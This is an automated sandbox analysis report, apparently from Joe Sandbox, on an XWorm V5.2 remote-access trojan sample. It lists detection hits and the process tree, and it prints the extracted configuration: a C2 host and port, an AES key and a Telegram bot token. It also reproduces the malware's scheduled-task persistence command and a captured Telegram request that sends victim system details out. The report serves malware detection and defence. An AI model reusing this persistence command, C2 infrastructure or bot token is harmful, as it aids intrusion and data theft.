Windows Analysis Report
X.exe

Overview

General Information

Sample name: X.exe
Analysis ID: 1387988
MD5: f57ec853b0f01b0e9954cfbf8feeb081
SHA1: f0197d2da76f563373686dd104305d1eeb21ec7c
SHA256: 3d07268c23490174416ef5a8061e318b5b8b820cb89b27803996085c3b3ee927
Tags: exe

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Yara signature match

Classification

  • System is w10x64
  • X.exe (PID: 7096 cmdline: C:\Users\user\Desktop\X.exe MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
    • schtasks.exe (PID: 5920 cmdline: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 3416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 5004 cmdline: C:\Windows\system32\WerFault.exe -u -p 7096 -s 2972 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • Svchost.exe (PID: 5632 cmdline: C:\Users\user\AppData\Local\Temp\Svchost.exe MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
  • Svchost.exe (PID: 6884 cmdline: C:\Users\user\AppData\Local\Temp\Svchost.exe MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
  • Svchost.exe (PID: 6256 cmdline: "C:\Users\user\AppData\Local\Temp\Svchost.exe" MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
  • Svchost.exe (PID: 3088 cmdline: "C:\Users\user\AppData\Local\Temp\Svchost.exe" MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
  • Svchost.exe (PID: 1176 cmdline: C:\Users\user\AppData\Local\Temp\Svchost.exe MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
  • Svchost.exe (PID: 5896 cmdline: C:\Users\user\AppData\Local\Temp\Svchost.exe MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
  • Svchost.exe (PID: 6460 cmdline: C:\Users\user\AppData\Local\Temp\Svchost.exe MD5: F57EC853B0F01B0E9954CFBF8FEEB081)
  • svchost.exe (PID: 5860 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 2888 cmdline: C:\Windows\system32\WerFault.exe -pss -s 460 -p 7096 -ip 7096 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 3656 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": ["trusting-smoke-90361.pktriot.net"], "Port": "22100", "Aes key": "<123456789>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627"}
Source | Rule | Description | Author | Strings
X.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
X.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
X.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x7a76:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7b13:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7c28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x78b2:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\Svchost.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Local\Temp\Svchost.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Local\Temp\Svchost.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x7a76:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7b13:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7c28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x78b2:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x7876:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7913:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7a28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x76b2:$cnc4: POST / HTTP/1.1
Process Memory Space: X.exe PID: 7096 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |

Source | Rule | Description | Author | Strings
0.0.X.exe.1f0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.0.X.exe.1f0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
0.0.X.exe.1f0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x7a76:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7b13:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7c28:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x78b2:$cnc4: POST / HTTP/1.1

                  System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\X.exe, ProcessId: 7096, TargetFilename: C:\Users\user\AppData\Local\Temp\Svchost.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user\AppData\Local\Temp\Svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\X.exe, ProcessId: 7096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Svchost
Source: Process started | Author: David Burkett, @signalblur | Data: Command: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 5632, ProcessName: Svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 5632, ProcessName: Svchost.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\Svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\X.exe, ProcessId: 7096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Svchost
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\X.exe, ProcessId: 7096, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 5632, ProcessName: Svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\X.exe, ParentImage: C:\Users\user\Desktop\X.exe, ParentProcessId: 7096, ParentProcessName: X.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 5920, ProcessName: schtasks.exe
Source: Process started | Author: vburov | Data: Command: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 5632, ProcessName: Svchost.exe

                  Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\X.exe, ParentImage: C:\Users\user\Desktop\X.exe, ParentProcessId: 7096, ParentProcessName: X.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe, ProcessId: 5920, ProcessName: schtasks.exe
Timestamp: 02/07/24-03:23:12.549811
Source IP: 192.168.2.6
Destination IP: 167.71.56.116
SID: 2855924
Source Port: 49753
Destination Port: 22100
Protocol: TCP
Classtype: A Network Trojan was detected

                  AV Detection

Source: X.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\Svchost.exe | Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: 00000004.00000002.2156316265.00000000028EC000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["trusting-smoke-90361.pktriot.net"], "Port": "22100", "Aes key": "<123456789>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627"}
Source: eu-central-7075.packetriot.net | Virustotal: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\Svchost.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\Svchost.exe | Virustotal: Detection: 79%
Source: X.exe | ReversingLabs: Detection: 81%
Source: X.exe | Virustotal: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\Svchost.exe | Joe Sandbox ML: detected
Source: X.exe | Joe Sandbox ML: detected
Source: X.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: X.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

Source: Traffic | Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.6:49753 -> 167.71.56.116:22100
Source: Malware configuration extractor | URLs: trusting-smoke-90361.pktriot.net
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: X.exe, type: SAMPLE
Source: Yara match | File source: 0.0.X.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.6:49700 -> 167.71.56.116:22100
Source: global traffic | HTTP traffic detected: GET /bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE9633C7A2F2B74FB9C2E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%208ZZ4CZYT%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 167.71.56.116
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: api.telegram.org
                  Source: svchost.exe, 00000012.00000002.4521622170.00000152D096F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046796242.00000152D096E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046462354.00000152D096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy=80601
                  Source: svchost.exe, 00000012.00000002.4521525759.00000152D0913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521577838.00000152D095F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4056518662.00000152D0966000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: svchost.exe, 00000012.00000002.4521550829.00000152D0937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scerence
                  Source: svchost.exe, 00000012.00000002.4521525759.00000152D0913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4031991419.00000152D0E52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521577838.00000152D095F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4056518662.00000152D0966000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521550829.00000152D0937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000012.00000003.4032063230.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4032063230.00000152D095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 00000012.00000002.4521622170.00000152D096F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046796242.00000152D096E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046462354.00000152D096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue.srf
                  Source: svchost.exe, 00000012.00000002.4521622170.00000152D096F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046796242.00000152D096E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046462354.00000152D096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000012.00000002.4521622170.00000152D096F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046796242.00000152D096E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046462354.00000152D096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: X.exe, 00000000.00000002.4055350482.0000000002561000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.17.dr String found in binary or memory: http://upx.sf.net
                  Source: X.exe, Svchost.exe.0.dr String found in binary or memory: https://api.telegram.org/bot
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4522000138.00000152D0E80000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521550829.00000152D0937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 00000012.00000002.4521314909.00000152D00E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000012.00000002.4521911037.00000152D0E5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comVED
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
                  Source: svchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000012.00000003.4013867750.00000152D0927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
                  Source: svchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                  Source: svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknown, Network traffic detected: HTTP traffic on port 49699 -> 443
                  Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49699
                  Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49699 version: TLS 1.2

                  System Summary

                  Source: X.exe, type: SAMPLE, Matched rule: Detects AsyncRAT, Author: ditekSHen
                  Source: 0.0.X.exe.1f0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT, Author: ditekSHen
                  Source: 00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Detects AsyncRAT, Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPED, Matched rule: Detects AsyncRAT, Author: ditekSHen
                  Source: C:\Users\user\Desktop\X.exe, Process Stats: CPU usage > 49%
